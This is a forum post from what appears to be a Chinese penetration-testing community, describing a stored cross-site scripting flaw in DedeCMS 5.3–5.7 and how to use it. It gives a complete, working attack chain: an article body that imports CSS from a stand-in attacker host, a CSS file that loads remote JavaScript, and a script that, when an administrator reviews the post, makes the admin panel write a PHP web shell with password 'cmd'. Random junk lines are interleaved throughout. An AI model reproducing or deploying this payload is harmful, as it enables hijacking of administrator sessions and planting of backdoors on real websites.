中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
7 }" C9 x6 t2 Z5 G
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
v) ?! e! J, M8 t1 g! ~4 E
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
" L) ?+ f7 }0 t! Z6 z
下面说说利用方法。
; n3 e- Z, G( o6 h0 F
条件有2个:
& E m& N' D' ^5 k2 O
1.开启注册
- J9 ~( n3 K6 F0 I) s d
2.开启投稿
& j1 A' T. J3 ^2 X; O7 J) c# ^
注册会员----发表文章
+ `* L4 q, |! w1 e% z) J0 N
内容填写:
" Y: Q) `: W! C
复制代码
. y2 D- x8 K( N+ V% F3 p$ X
<style>@im\port'\
http://xxx.com/xss.css';
</style>
8 `. C2 Z2 G; C9 L7 @' d- U' y
新建XSS.Css
/ @* f% P( S+ x
复制代码
: M: d; x% Z" D) A% B& o; R
.body{
$ g) Q* Q, d& { e }
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
4 r5 H9 B! C& \( z2 | s K
新建xss.js 内容为
) Z3 p- W& G: _6 |
复制代码
2 q9 P, k8 j7 ~: T7 K
1.var request = false;
$ n7 q' J t5 d8 \. ^- v
2.if(window.XMLHttpRequest) {
, m: y$ }4 D2 } }8 o+ ?
3.request = new XMLHttpRequest();
6 |: M. ^, D4 @$ L. \
4.if(request.overrideMimeType) {
/ S# p* K5 T& x4 f% Y" {
5.request.overrideMimeType('text/xml');
+ I/ A* K& F- J/ ~1 ^
6.}
1 T; J; m4 x( r/ r9 `
7.} else if(window.ActiveXObject) {
5 E6 Q( u8 T z8 z9 l. o3 b/ ^$ G
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
3 ^1 x# N5 N- x! K: ~% w
9.for(var i=0; i<versions.length; i++) {
- M9 r X( Q k. }
10.try {
, `# S g/ N- V1 c5 v
11.request = new ActiveXObject(versions);
( N$ D9 \+ s# u0 t: y. f0 }
12.} catch(e) {}
2 i" u7 ~: b% `6 u) l/ G% p
13.}
4 x5 d! ?: |( X
14.}
. B& x2 P1 ~, W" M
15.xmlhttp=request;
8 ]! J' H a1 K. d
16.function getFolder( url ){
1 z" y2 t( ~! w( C6 }! W
17. obj = url.split('/')
; R0 D6 A9 v# r% w9 n- A8 M
18. return obj[obj.length-2]
) R5 @+ Q! ?8 ~, R: z. j
19.}
& ]" s& T8 [/ D
20.oUrl = top.location.href;
0 p; w3 P3 [; I
21.u = getFolder(oUrl);
6 u2 a" a5 g$ e
22.add_admin();
; R" O( N7 ?& w& g- A. h
23.function add_admin(){
/ y. }9 H0 S0 l1 P
24.var url= "/"+u+"/sys_sql_query.php";
% K3 H5 @& }$ I. d- p) V3 d: q# N
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
( L0 x. [6 w% M7 `5 |1 [
26.xmlhttp.open("POST", url, true);
' m5 I( W h# S3 F3 T; ^
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
( c, J4 H) Q7 f
28.xmlhttp.setRequestHeader("Content-length", params.length);
# n3 S/ p# k% j+ X% _
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
1 F) I/ i3 |9 \( P$ h( B
30.xmlhttp.send(params);
* S+ ?2 m; g8 l3 P0 l$ d: @
31.}
$ ?$ {! q* [0 o: ?7 Y# H1 R. r
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2